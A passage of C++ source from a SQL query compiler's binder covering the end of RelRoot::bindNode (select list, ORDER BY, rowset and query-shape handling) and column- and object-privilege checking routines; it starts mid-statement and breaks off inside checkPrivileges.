setTolerateNonFatalError(RelExpr::NOT_ATOMIC_); } } CMPASSERT(currScope == bindWA->getCurrentScope()); // sanity check // do not do olt qry optimization, if rowsets are present. if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->done()) { oltOptInfo().setOltOpt(FALSE); if (bindWA->getHostArraysArea()->getTolerateNonFatalError()) { // we also cannot do dp2 level olt optimization if this is a non-atomic rowset insert oltOptInfo().setOltEidOpt(FALSE); } else { // but can do dp2 level olt optimization if this is "regular" rowset insert oltOptInfo().setOltEidOpt(TRUE); } } // If unresolved aggregate functions have been found in the children of the // root node, that would mean that we are referencing aggregates before // the groupby operation is performed if (checkUnresolvedAggregates(bindWA)) return this; // A RelRoot does not have a select list for SQL update, delete, insert // statements as well as when the query contains an SQL union. If a // select list is absent, assign the select list of its child to it. // This will propagate the selection lists of the children of the // union up to the root. // // Detach the item expression tree for the select list and bind it. // ItemExpr *compExprTree = removeCompExprTree(); if (NOT compExprTree) { // -- for RI and Triggers if (isEmptySelectList()) setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); else { setRETDesc(child(0)->getRETDesc()); getRETDesc()->getValueIdList(compExpr()); } } else { CMPASSERT(!currScope->context()->inSelectList()); currScope->context()->inSelectList() = TRUE; // QSTUFF // in case we are binding an embedded generic update within a view // we have to rename column references using OLD or NEW as // table names since we adopted the RETDesc/TableDesc of the // scan node or the view scan node, i.e. the RenameTable node // at the root of an expanded view. if (bindWA->renameToScanTable()){ ColReference * cr = NULL; ItemExpr * itm = compExprTree; NABoolean done = FALSE; const CorrName corr = (getViewScanNode()->getOperatorType() == REL_RENAME_TABLE) ? 
((RenameTable *)getViewScanNode())->getTableName() : ((Scan *)getViewScanNode())->getTableDesc()->getCorrNameObj(); while (NOT done){ if (itm->getOperatorType() == ITM_ITEM_LIST){ cr = (ColReference *) itm->getChild(0); itm = itm->getChild(1)->castToItemExpr(); } else { cr = (ColReference *) itm; done = TRUE; } cr->getCorrNameObj().getQualifiedNameObj(). setObjectName(corr.getQualifiedNameObj().getObjectName()); } } // QSTUFF RelRoot *viewQueryRoot = NULL; StmtDDLCreateView *pCreateView = NULL; if (bindWA->inViewDefinition()) { pCreateView = bindWA->getCreateViewParseNode(); if (pCreateView->getQueryExpression() == this) { viewQueryRoot = this; CMPASSERT(isTrueRoot()); pCreateView->setCurViewColNum((CollIndex)0); } } // charset inference compExprTree->setResolveIncompleteTypeStatus(TRUE); HostArraysWA * arrayWA = bindWA->getHostArraysArea() ; if (arrayWA && arrayWA->hasHostArraysInTuple()) { CollIndex counterRowVals = 0; CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues()); bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals; // If this query (scope) contains OLAP Window functions, then add // a Sequence Operator just below the Root node. Also, if aggregates // exist, resolve them now. // setRETDesc(bindRowValues(bindWA, compExprTree, compExpr(), this, isTrueRoot())); bindWA->getCurrentScope()->context()->counterForRowValues() = NULL; } else { setRETDesc(bindRowValues(bindWA, compExprTree, compExpr(), viewQueryRoot, isTrueRoot())); } if (bindWA->errStatus()) return NULL; if (viewQueryRoot) pCreateView->resetCurViewColNum(); currScope->context()->inSelectList() = FALSE; } // MVs -- if (bindWA->isPropagateOpAndSyskeyColumns() && child(0)->getOperatorType()!=REL_GROUPBY && child(0)->getOperatorType()!=REL_AGGREGATE && currScope->getUnresolvedAggregates().isEmpty() && !isEmptySelectList() && !isTrueRoot()) getRETDesc()->propagateOpAndSyskeyColumns(bindWA, TRUE); CMPASSERT(currScope == bindWA->getCurrentScope()); // sanity check currScope->setRETDesc(getRETDesc()); bindWA->setRenameToScanTable(FALSE); // QSTUFF // Genesis 10-980106-2038 + 10-990202-1098. // if (isTrueRoot()) { castComputedColumnsToAnsiTypes(bindWA, getRETDesc(), compExpr()); if (bindWA->errStatus()) return NULL; } // Genesis 10-970822-2581. See finalize() in SqlParser.y. // // If we are in a compound statement (an IF's UNION), do not issue an error. // // Added condition for CALL StoredProcedures // If we invoke a CALL statement, the #out params do not match the // # columns, we make that check in the CallSP::bindNode, so ignore it // for now. if (isTrueRoot() && (child(0)->getOperatorType() != REL_CALLSP && (child(0)->getOperatorType() != REL_COMPOUND_STMT && (child(0)->getOperatorType() != REL_TUPLE && (Int32)getRETDesc()->getDegree() != 0))) && (child(0)->getOperatorType() != REL_UNION || (!((Union *) (RelExpr *) child(0))->getUnionForIF())) && outputVarCntValid() && outputVarCnt() != (Int32)getRETDesc()->getDegree() && (outputVarCnt() || CmpCommon::context()->GetMode() != STMT_DYNAMIC)) { // 4093 The number of output parameters ($0) must equal the number of cols // 4094 The number of output host vars ($0) must equal the number of cols Lng32 sqlcode = (CmpCommon::context()->GetMode() == STMT_DYNAMIC) ? 
-4093 : -4094; *CmpCommon::diags() << DgSqlCode(sqlcode) #pragma nowarn(1506) // warning elimination << DgInt0(outputVarCnt()) << DgInt1(getRETDesc()->getDegree()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ItemExpr *inputVarTree = removeInputVarTree(); if (inputVarTree) { inputVarTree->convertToValueIdList(inputVars(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; // If DYNAMIC SQL compilation, then // remove from the input var list (list of HostVars and DynamicParams) // any env vars that were found to have a equivalence value which is // valid (parseable) for the context it appears in // (i.e., we've already bound the env var name's dynamic value, // so we no longer need the env var name at all). // Right now, this means that in sqlci you can say // set envvar xyz cat.sch.tbl; // select * from $xyz; // if (CmpCommon::context()->GetMode() == STMT_DYNAMIC) { for (CollIndex i = inputVars().entries(); i--; ) { HostVar *hostVar = (HostVar *)inputVars()[i].getItemExpr(); if (hostVar->getOperatorType() == ITM_HOSTVAR && hostVar->isPrototypeValid() && (hostVar->isEnvVar() || hostVar->isDefine())) inputVars().removeAt(i); } } // STMT_DYNAMIC } // inputVarTree // add to the inputVars, any user functions that are to be treated // like input values, that is, evaluated once and used therafter. // Do not insert duplicate value ids. for (CollIndex i = 0; i < bindWA->inputFunction().entries(); i++ ) { if (NOT inputVars().contains(bindWA->inputFunction()[i])) inputVars().insert(bindWA->inputFunction()[i]); } // If aggregate functions have been found in the select list, then // create a groupby node with an empty groupby list, if the child is not // already a groupby node. // resolveAggregates(bindWA); if (bindWA->errStatus()) return NULL; // Add the unresolvedSequenceFunctions to the Sequence node for this // scope. If there are sequence functions, but no sequence node, it // is an error. Also if there is a sequence node, but no sequence // functions, it is an error. // If OLAP Window functions exist for this scope, they will have been // translated into sequence functions by this point and so will be added // to the Sequence node here. // resolveSequenceFunctions(bindWA); if (bindWA->errStatus()) return NULL; BindScope *prevScope = bindWA->getPreviousScope(currScope); NABoolean inRowSubquery = FALSE; if (prevScope) inRowSubquery = prevScope->context()->inRowSubquery(); if (inRowSubquery && (CmpCommon::getDefault(COMP_BOOL_137) == DF_OFF)) addOneRowAggregates(bindWA); returnedRoot = transformGroupByWithOrdinalPhase2(bindWA); if (! returnedRoot) return NULL; // ItemExpr *orderByTree = removeOrderByTree(); ItemExpr *orderByTree = removeOrderByTree(); if (orderByTree) { // // Tandem extension to ANSI (done only if source table is not grouped!): // Allow the ORDER BY clause to reference columns in the source table even // if the columns are not referenced in the select list. Treat the extra // columns as *system* columns so that they can be referenced by name // (ORDER BY name) but not by position in select list (ORDER BY n). // Thus, select-list columns have precedence, as they should since ANSI // allows only them in ORDER BY to begin with! // // Add all source columns to system column list of temporary orderBy; // remove select-list columns from this system column list; // insert select-list columns into the *user* column list // (these must be in separate loops to set up the orderBy XCNM correctly!). 
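    // Illustrative (hypothetical) example: for
    //   select a from t order by b;
    // (source not grouped) column b is exposed as a system column of the
    // temporary orderBy RETDesc so it can be referenced by name, while only
    // select list column a can also be referenced by ordinal.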
// Then bind the temporary (convert to ValueId list), reset the RETDesc. // bindWA->getCurrentScope()->context()->inOrderBy() = TRUE; CollIndex i; RETDesc orderBy; const RETDesc &select = *getRETDesc(); const RETDesc &source = *child(0)->getRETDesc(); // if the source is grouped, then the ORDER BY columns must be in // the select list. So, don't add any other columns that aren't // in the select list... if (source.isGrouped()) { orderBy.setGroupedFlag(); //10-031125-1549 -begin //Since we are processing a groupby we should //certainly have some node below it. Futher if //that node is a REL_ROOT we will certainly have //a child. So this rather unusual call sequence //is safe. We are actually looking for a Pattern //like REL_GROUPBY(REL_ROOT(*)) introduced to handle //Distint qualifier. //for example if we have a query like //select distinct j as jcol from t1 order by j; //the tree will look like //REL_ROOT(REL_GROUPBY(REL_ROOT(REL_SCAN(t1)))) //In this is a NON-ANSI query. To support queries like this //we need to expose "J" as a system column. To do that we need //to get hold of the RetDesc of the node below the REL_ROOT //(not the actual REL_ROOT). RETDesc *src = NULL; if(child(0)->child(0)&& child(0)->child(0)->getOperatorType() == REL_ROOT) { src = child(0)->child(0)->child(0)->getRETDesc(); } else { src = child(0)->getRETDesc(); } const ColumnDescList &sysColList = *src->getSystemColumnList(); const ColumnDescList &usrColList = *src->getColumnList(); ValueId vid; for(i = 0; i < select.getDegree(); i++) { vid = select.getValueId(i); for(CollIndex j = 0; j < sysColList.entries(); j++){ if( vid == sysColList[j]->getValueId()){ orderBy.addColumn(bindWA, sysColList[j]->getColRefNameObj() , sysColList[j]->getValueId() , SYSTEM_COLUMN); } } for(CollIndex k = 0; k < usrColList.entries(); k++){ if(vid == usrColList[k]->getValueId()){ orderBy.addColumn(bindWA, usrColList[k]->getColRefNameObj() , usrColList[k]->getValueId() , SYSTEM_COLUMN); } } } //10-031125-1549 -end NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); // In specialMode, we want to support order by on columns // which are not explicitely specified in the select list. // Ex: select a+1 from t group by a order by a; // Find all the column references in the orderByTree which are // also in the group by list but are not explicitely specified // in the select list. // This code path is for cases when both GROUP BY and ORDER BY are // specified. // If order by is specified without the group by, then that case // is already covered in the 'else' portion. 
if ((specialMode) && (child(0)->getOperatorType() == REL_GROUPBY) && (allOrderByRefsInGby_)) // already validated that all order by cols // are also in group by clause { ItemExprList orderByList(orderByTree, bindWA->wHeap()); GroupByAgg * grby=(GroupByAgg *)(child(0)->castToRelExpr()); for (CollIndex ii = 0; ii < orderByList.entries(); ii++) { ItemExpr * colRef = orderByList[ii]; if (colRef->getOperatorType() == ITM_INVERSE) colRef = colRef->child(0)->castToItemExpr(); if (colRef && colRef->getOperatorType() == ITM_REFERENCE) { ColReference * obyColRef = (ColReference*)colRef; for (CollIndex k = 0; k < usrColList.entries(); k++) { if (obyColRef->getColRefNameObj().getColName() == usrColList[k]->getColRefNameObj().getColName()) { orderBy.delColumn(bindWA, usrColList[k]->getColRefNameObj(), SYSTEM_COLUMN); orderBy.addColumn(bindWA, usrColList[k]->getColRefNameObj(), usrColList[k]->getValueId(), SYSTEM_COLUMN); break; } // if } // for } // if } // for } for (i = 0; i < select.getDegree(); i++) orderBy.delColumn(bindWA, select.getColRefNameObj(i), SYSTEM_COLUMN); } else { // add the potential ORDER BY columns... omitting the ones that will // in the select list anyway. orderBy.addColumns(bindWA, *source.getColumnList(), SYSTEM_COLUMN); orderBy.addColumns(bindWA, *source.getSystemColumnList(), SYSTEM_COLUMN); for (i = 0; i < select.getDegree(); i++) orderBy.delColumn(bindWA, select.getColRefNameObj(i), SYSTEM_COLUMN); } for (i = 0; i < select.getDegree(); i++) orderBy.addColumn(bindWA, select.getColRefNameObj(i), select.getValueId(i), USER_COLUMN); bindWA->getCurrentScope()->setRETDesc(&orderBy); // fix for defect 10-010522-2978 // If we need to move this OrderBy to the RelRoot above this one... // move it to the rowsetReqdOrder_ of that RelRoot, otherwise keep // it at this level... in the current RelRoot's reqdOrder_ ValueIdList & pRRO = getParentForRowsetReqdOrder() ? getParentForRowsetReqdOrder()->rowsetReqdOrder_ : reqdOrder(); // Replace any selIndexies in the orderByTree with what it refers to // before we expand it. // This is done so that we can deal with subqueries with degree > 1 // and MVFs. ItemExpr *sPtr = orderByTree, *ePtr = orderByTree; Int32 childIdx = 0; NABoolean onlyOneEntry(TRUE); CollIndex selListCount = compExpr().entries(); while (sPtr != NULL) { if (sPtr->getOperatorType() == ITM_ITEM_LIST) { ePtr = sPtr; sPtr = ePtr->child(0); childIdx = 0; onlyOneEntry = FALSE; } if (sPtr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)(sPtr); CollIndex selIndex = si->getSelIndex(); if(selIndex == 0 || selIndex > selListCount) { *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)si->getSelIndex()) << DgInt1(selListCount); bindWA->setErrStatus(); return NULL; } ValueId orderById = compExpr()[si->getSelIndex()-1]; if (ePtr->getOperatorType() == ITM_ITEM_LIST) ePtr->child(childIdx) = orderById.getItemExpr(); else ePtr = orderById.getItemExpr(); orderById.getItemExpr()->setInOrderByOrdinal(TRUE); } if ((ePtr->getArity() == 2) && ePtr->child(1) != NULL && ePtr->child(1)->getOperatorType() != ITM_ITEM_LIST && childIdx != 1) childIdx = 1; else childIdx = 0; sPtr = (childIdx == 1) ? ePtr->child(1) : NULL; } if (onlyOneEntry) orderByTree = ePtr; // If we had any ordinal expressions expand them in case there // are any UDFs or subquery of degree > 1. // Also expand any directly referenced UDFs and subqueries of degree > 1. 
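      // Illustrative (hypothetical) example: if select list entry 2 is a
      // subquery of degree 3, its ORDER BY ordinal was replaced by the
      // select list item above; the conversion below expands it into the
      // required sort order.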
ItemExprList origOrderByList(orderByTree, bindWA->wHeap()); origOrderByList.convertToItemExpr()-> convertToValueIdList(pRRO, bindWA, ITM_ITEM_LIST); // end fix for defect 10-010522-2978 if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); bindWA->getCurrentScope()->context()->inOrderBy() = FALSE; } // validate that select list doesn't contain any expressions that cannot be // grouped or ordered. for (Lng32 selIndex = 0; selIndex < compExpr().entries(); selIndex++) { ItemExpr * ie = compExpr()[selIndex].getItemExpr(); if ((ie->inGroupByOrdinal()) || (ie->inOrderByOrdinal())) { if (NOT ie->canBeUsedInGBorOB(TRUE)) { return NULL; } } } if (hasPartitionBy()) { ItemExpr *partByTree = removePartitionByTree(); partByTree->convertToValueIdSet(partArrangement_, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; } // fix for defect 10-010522-2978 // If we're the upper level RelRoot, we must check to see if we have // any entries that need to be added to reqdOrder() and add them if // there are any... if ( rowsetReqdOrder_.entries() ) { // We never expect for reqdOrder to contain any entries. But // if it ever does, we want to be able to take a look at this // code again to decide whether we should be appending to the // reqdOrder list. Currently the code is written to append to // the end of the reqdOrder list, which is likely to be the correct // behavior even if there are entries in reqdOrder; we just think // that someone should have the chance to rethink this in the event // there are entries in reqdOrder and so we're making it fail here // to allow/force someone to make the decision. CMPASSERT(reqdOrder().entries() == 0); // note: NAList<ValueIdList>::insert(const NAList<ValueIdList> &) // actually does an append to the END of the list (not an // insert at the head or after the current position). reqdOrder().insert( rowsetReqdOrder_ ); } // end fix for defect 10-010522-2978 // Bind the update column specification of a cursor declaration. // Don't remove the tree: leave it for possible error 4118 in NormRelExpr. if (updateColTree_) { updateColTree_->convertToValueIdList(updateCol(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { if (CmpCommon::diags()->contains(-4001)) *CmpCommon::diags() << DgSqlCode(-4117); return NULL; } if (getGroupAttr()->isEmbeddedDelete()) { // QSTUFF *CmpCommon::diags() << DgSqlCode(-4169); bindWA->setErrStatus() ; return NULL; } } // check whether a CONTROL QUERY SHAPE statement is in effect. // Do not do if this is a control query statement. 
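  // If a CONTROL QUERY SHAPE statement was issued earlier in the session,
  // its shape is kept in the ControlDB; the code below copies that shape
  // into reqdShape_ (except for DDL/utility/control-like children) so the
  // optimizer will enforce it for this query.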
if (ActiveControlDB()->getRequiredShape()) { OperatorTypeEnum op = child(0)->getOperatorType(); if (!child(0)->isAControlStatement() && op != REL_DESCRIBE && op != REL_EXPLAIN && op != REL_DDL && op != REL_LOCK && op != REL_UNLOCK && op != REL_SET_TIMEOUT && op != REL_STATISTICS && op != REL_TRANSACTION && op != REL_EXE_UTIL) reqdShape_ = ActiveControlDB()->getRequiredShape()->getShape(); } // If this is a parallel extract producer query: // * the number of requested streams must be greater than one and // not more than the number of configured CPUs // * force a shape with an ESP exchange node immediately below // the root ComUInt32 numExtractStreams = getNumExtractStreams(); if (numExtractStreams_ > 0) { // Check the number of requested streams NADefaults &defs = bindWA->getSchemaDB()->getDefaults(); NABoolean fakeEnv = FALSE; ComUInt32 numConfiguredESPs = defs.getTotalNumOfESPsInCluster(fakeEnv); if ((numExtractStreams == 1) || (numExtractStreams > numConfiguredESPs)) { *CmpCommon::diags() << DgSqlCode(-4119) << DgInt0((Lng32) numConfiguredESPs); bindWA->setErrStatus(); return NULL; } // Force the shape. There are three cases to consider: // a. there is no required shape in the ControlDB // b. there is a required shape and it is acceptable for this // parallel extract. // c. there is a required shape and it is not acceptable. if (reqdShape_ == NULL) { // Case a. // Manufacture an esp_exchange(cut,N) shape reqdShape_ = new (bindWA->wHeap()) ExchangeForceWildCard(new (bindWA->wHeap()) CutOp(0), ExchangeForceWildCard::FORCED_ESP_EXCHANGE, ExchangeForceWildCard::ANY_LOGPART, (Lng32) numExtractStreams_); } else { NABoolean reqdShapeIsOK = FALSE; if (reqdShape_->getOperatorType() == REL_FORCE_EXCHANGE) { ExchangeForceWildCard *exch = (ExchangeForceWildCard *) reqdShape_; ExchangeForceWildCard::forcedExchEnum whichType = exch->getWhich(); Lng32 howMany = exch->getHowMany(); if (whichType == ExchangeForceWildCard::FORCED_ESP_EXCHANGE && howMany == (Lng32) numExtractStreams_) { reqdShapeIsOK = TRUE; } } if (reqdShapeIsOK) { // Case b. // Do nothing } else { // Case c. // Add an esp_exchange to the top of the required shape RelExpr *child = reqdShape_; reqdShape_ = new (bindWA->wHeap()) ExchangeForceWildCard(child, ExchangeForceWildCard::FORCED_ESP_EXCHANGE, ExchangeForceWildCard::ANY_LOGPART, (Lng32) numExtractStreams_); } } // if (reqdShape_ == NULL) else ... } // if (numExtractStreams_ > 0) // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // If we have dynamic rowsets, we want to replace // dynamic parameters with available inputs. if (isTrueRoot() && bindWA->hasDynamicRowsetsInQuery()) { ValueIdSet inputs = getGroupAttr()->getCharacteristicInputs(); UInt32 j = 0; // this for loop is over the list of available inputs. We are replacing array // parameters with hostvars introduced during HostArraysWA::processArrayHostVar // The hostvars introduced in that method are contained in the inputs() list. for (ValueId id = inputs.init(); inputs.next(id); inputs.advance(id)) { if (id.getItemExpr()->getOperatorType() == ITM_DYN_PARAM) { continue; } // We are assuming here that the hostvars introduced are in the same order as // the parameter arrays in inputVars(), i.e. 
(hv_A, hv_B) corresponds to // (?,?,?(as A), ?(as B)) while (j < inputVars().entries()) { ItemExpr *ie = inputVars()[j].getItemExpr() ; OperatorTypeEnum ieType = ie->getOperatorType() ; if (( ieType != ITM_DYN_PARAM) || (((DynamicParam *) ie)->getRowsetSize() == 0)) { // if an ie is not a dynamicParam or it is a scalar dynamic Param do not remove // it from inputVars_. From embedded SQL it is possible to have scalar and array // dynamic params in the same statement. This is not possible from ODBC. j++; } else break ; } if (j < inputVars().entries()) { inputVars().removeAt(j); inputVars().insertAt(j, id); j++; } } } // RelRoot::codeGen() and Statement::execute() use TOPMOST root's accessOpts. // if (bindWA->getCurrentScope()->context()->stmtLevelAccessOptions()) if (!accessOptions().userSpecified()) // seems redundant accessOptions() = *bindWA->getCurrentScope()->context()->stmtLevelAccessOptions(); // Update operations currently require SERIALIZABLE (== MP REPEATABLE_) // locking level -- the QSTUFF-enabled DP2 now does this, supporting a true // READ_COMMITTED that is STABLE rather than merely CLEAN. if (!containsGenericUpdate(this)) { // Genesis 10-990114-6293: // This flag tells RelRoot::codeGen to set a flagbit in the root-tdb which // cli/Statement::execute + compareTransModes() will look at -- // if set, then this "read-write" stmt will be allowed to execute // in a run-time transmode of read-only W/O HAVING TO BE RECOMPILED. readOnlyTransIsOK() = TRUE; } if (isTrueRoot()) { if (updateCurrentOf()) { // add child genericupdate's primary key hostvars to pkeyList. // The getLeftmostScanNode() method will return the leftmost Scan node // as the original scan node may have moved due to the IM tree. pkeyList().insert(child(0)->castToRelExpr()->getLeftmostScanNode()->pkeyHvarList()); } for(Int32 st=0; st < (Int32)bindWA->getStoiList().entries(); st++) { if(bindWA->getStoiList()[st]->getStoi()->isView()) viewStoiList_.insert(bindWA->getStoiList()[st]); } if(bindWA->inDDL()) ddlStoiList_.insert(bindWA->getStoiList()); // populate the list of all the routines open information of this query stoiUdrList_.insert(bindWA->getUdrStoiList()); // populate the list of all the UDF information of this query udfList_.insert(bindWA->getUDFList()); // check privileges if (!checkPrivileges(bindWA)) { bindWA->setErrStatus(); return NULL; } // store the trigger's list in the root if (bindWA->getTriggersList()) { triggersList_ = new (bindWA->wHeap()) LIST(ComTimestamp) (bindWA->wHeap(), bindWA->getTriggersList()->entries()); triggersList_->insert(*(bindWA->getTriggersList())); // Don't allow OLT optimization when triggers are involved. oltOptInfo().setOltOpt(FALSE); } // store the uninitialized mv list if there are any // entries if( bindWA->getUninitializedMvList() ) { uninitializedMvList_ = new (bindWA->wHeap()) UninitializedMvNameList (bindWA->wHeap(), bindWA->getUninitializedMvList()->entries()); uninitializedMvList_->insert( *(bindWA->getUninitializedMvList()) ); } DBG( if (getenv("TVUSG_DEBUG")) bindWA->tableViewUsageList().display(); ) } // isTrueRoot // Don't allow OLT optimization when ON STATEMENT MV refresh is involved. if (bindWA->isBindingOnStatementMv()) oltOptInfo().setOltOpt(FALSE); // disable esp parallelism for merge statements. // See class RelRoot for details about this. if ((isTrueRoot()) && (bindWA->isMergeStatement())) { setDisableESPParallelism(TRUE); } // Remove the current scope. 
// if (!isDontOpenNewScope()) // -- Triggers bindWA->removeCurrentScope(); // In case we have a query of the form // SET <host var list> = <select statement> // we must update the value ids of the host variables in that list. // See Assignment Statement Internal Spec (a project of Compound Statements). if (assignmentStTree() && bindWA->getAssignmentStArea() && bindWA->getAssignmentStArea()->getAssignmentStHostVars() && !bindWA->getAssignmentStArea()->getAssignmentStHostVars()-> updateValueIds(compExpr(), assignmentStTree())) { bindWA->setErrStatus(); return NULL; } if (getPredExprTree()) { CMPASSERT(isTrueRoot()); ItemExpr * ie = removePredExprTree(); ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return NULL; addPredExprTree(ie); } if (getFirstNRowsParam()) { firstNRowsParam_ = firstNRowsParam_->bindNode(bindWA); if (bindWA->errStatus()) return this; const SQLInt si(FALSE, FALSE); ValueId vid = firstNRowsParam_->castToItemExpr()->getValueId(); vid.coerceType(si, NA_NUMERIC_TYPE); if (vid.getType().getTypeQualifier() != NA_NUMERIC_TYPE) { // 4045 must be numeric. *CmpCommon::diags() << DgSqlCode(-4045) << DgString0(getTextUpper()); bindWA->setErrStatus(); return this; } } if ((NOT hasOrderBy()) && ((getFirstNRows() != -1) || (getFirstNRowsParam()))) { // create a firstN node to retrieve firstN rows. FirstN * firstn = new(bindWA->wHeap()) FirstN(child(0), getFirstNRows(), getFirstNRowsParam()); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); // reset firstN indication in the root node. setFirstNRows(-1); setFirstNRowsParam(NULL); } // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } if (bindWA->getHoldableType() == SQLCLIDEV_ANSI_HOLDABLE) { if (accessOptions().accessType() != ACCESS_TYPE_NOT_SPECIFIED_) { if (accessOptions().accessType() == REPEATABLE_) { *CmpCommon::diags() << DgSqlCode(-4381); bindWA->setErrStatus(); return NULL; } } else { TransMode::IsolationLevel il=CmpCommon::transMode()->getIsolationLevel(); if (CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) { *CmpCommon::diags() << DgSqlCode(-4381); bindWA->setErrStatus(); return NULL; } } } // The above code is in Scan::bindNode also. // It would be nice to refactor this common code; someday. 
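  // At this point all root-level binding work (select list, ORDER BY,
  // access options, first-N handling, privilege checks) has been done;
  // return the bound tree.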
return boundExpr; } // RelRoot::bindNode() // Present the select list as a tree of Item Expressions ItemExpr *RelRoot::selectList() { return compExpr().rebuildExprTree(ITM_ITEM_LIST); } // RelRoot::selectList() // Returns current place that assignmentStTree_ points to and // sets that pointer to NULL // LCOV_EXCL_START - cnu ItemExpr * RelRoot::removeAssignmentStTree() { ItemExpr* tempTree = assignmentStTree_; assignmentStTree_ = NULL; return tempTree; } // LCOV_EXCL_STOP bool OptSqlTableOpenInfo::checkColPriv(const PrivType privType, const PrivMgrUserPrivs *pPrivInfo) { CMPASSERT (pPrivInfo); NATable* table = getTable(); NAString columns = ""; if (!isColumnPrivType(privType)) { *CmpCommon::diags() << DgSqlCode(-4481) << DgString0(PrivMgrUserPrivs::convertPrivTypeToLiteral(privType).c_str()) << DgString1(table->getTableName().getQualifiedNameAsAnsiString()) << DgString2(columns); return false; } bool hasPriv = true; // initialize to something, gets set appropriately below LIST (Lng32) * colList = NULL ; switch (privType) { case INSERT_PRIV: { colList = (LIST (Lng32) *)&(getInsertColList()); break; } case UPDATE_PRIV: { colList = (LIST (Lng32) *)&(getUpdateColList()); break; } case SELECT_PRIV: { colList = (LIST (Lng32) *)&(getSelectColList()); break; } default: CMPASSERT(FALSE); // delete has no column privileges. } bool collectColumnNames = false; if (pPrivInfo->hasAnyColPriv(privType)) { collectColumnNames = true; columns += "(columns:" ; } bool firstColumn = true; for(size_t i = 0; i < colList->entries(); i++) { size_t columnNumber = (*colList)[i]; if (!(pPrivInfo->hasColPriv(privType,columnNumber))) { hasPriv = false; if (firstColumn && collectColumnNames) { columns += " "; firstColumn = false; } else if (collectColumnNames) columns += ", "; if (collectColumnNames) columns += table->getNAColumnArray()[columnNumber]->getColName(); } } if (collectColumnNames) columns += ")" ; // (colList->entries() == 0) ==> we have a select count(*) type query or a // select 1 from T type query. In other words the table needs to be accessed // but no column has been explicitly referenced. // For such queries if the user has privilege on any one column that is // sufficient. collectColumnNames indicates whether the user has privilege // on at least one column. The following if statement applies only to selects // For update and insert we do not expect colList to be empty. if ((colList->entries() == 0)&& !collectColumnNames) { hasPriv = false; columns = ""; } if (!hasPriv) *CmpCommon::diags() << DgSqlCode(-4481) << DgString0(PrivMgrUserPrivs::convertPrivTypeToLiteral(privType).c_str()) << DgString1(table->getTableName().getQualifiedNameAsAnsiString()) << DgString2(columns); return hasPriv; } NABoolean RelRoot::checkFirstNRowsNotAllowed(BindWA *bindWA) { // do not call this method on a true root. CMPASSERT(NOT isTrueRoot()); //***************************************************************** // FirstNRows >= 0 (for FirstN) // == -2 For Last 0 // == -3 For Last 1 // These values are set in parser; see the code SqlParser.y under // Non-Terminal querySpecification when fisrtN is specified //****************************************************************** if ( (getFirstNRows() >= 0 || getFirstNRows() == -2 || getFirstNRows() == -3) && // this root has firstn (!((getInliningInfo().isEnableFirstNRows()) || (getHostArraysArea() && getHostArraysArea()->getHasSelectIntoRowsets()) || //firstn is allowed with a rowset subroot (assignmentStTree())))) // first n is allowed in a CS. 
Presence of assignmentStTree // on a non true root implies presence of select into statement // within a cs { // 4102 The [FIRST/ANY n] syntax can only be used in an outermost SELECT statement. if (CmpCommon::getDefault(ALLOW_FIRSTN_IN_SUBQUERIES) == DF_OFF) return TRUE; } return FALSE; } // ---------------------------------------------------------------------------- // Method: checkPrivileges // // This method: // - Verifies that the user executing the query has the necessary privileges // - Adds security keys to RelRoot class that need to be checked when priv // changes (revokes) are performed. Security keys are part of the Query // Invalidation feature. // - Also, removes any previously cached entries if the user has no priv // // Input: pointer to the binder work area // Output: result of the check // TRUE - user has priv // FALSE - user does not have priv or unexpected error occurred // // The ComDiags area is populated with error details // The BindWA flag setFailedForPrivileges is set to TRUE if priv check fails // ---------------------------------------------------------------------------- NABoolean RelRoot::checkPrivileges(BindWA* bindWA) { // If internal caller and not part of explain, then return if (Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)) return TRUE; // If qiPath (used for testing) is not 0, skip root user check NAString qiPath = ""; CmpCommon::getDefault(QI_PATH, qiPath, FALSE); if (qiPath.length() == 0 && ComUser::isRootUserID()) return TRUE; // See if there is anything to check // StoiList contains any tables used in the query // UdrStoiList contains any routines used in the query // CoProcAggrList contains any queries using the aggregate co-processor // SeqValList contains any sequences if (bindWA->getStoiList().entries() == 0 && bindWA->getUdrStoiList().entries() == 0 && bindWA->getCoProcAggrList().entries() == 0 && bindWA->getSeqValList().entries() == 0) return TRUE; // If authorization is not enabled, then return TRUE if (!CmpCommon::context()->isAuthorizationEnabled()) return TRUE; ComBoolean QI_enabled = (CmpCommon::getDefault(CAT_ENABLE_QUERY_INVALIDATION) == DF_ON); NABoolean RemoveNATableEntryFromCache = FALSE ; // Have the ComSecurityKey constructor compute the hash value for the the User's ID. // Note: The following code doesn't care about the object's hash value or the resulting // ComSecurityKey's ActionType....we just need the hash value for the User's ID. int64_t objectUID = 12345; Int32 thisUserID = ComUser::getCurrentUser(); ComSecurityKey userKey( thisUserID , objectUID , SELECT_PRIV , ComSecurityKey::OBJECT_IS_OBJECT ); uint32_t userHashValue = userKey.getSubjectHashValue(); // Set up a PrivMgrCommands class in case we need to get privilege information NAString privMDLoc; CONCAT_CATSCH(privMDLoc,CmpSeabaseDDL::getSystemCatalogStatic(),SEABASE_PRIVMGR_SCHEMA); PrivMgrCommands 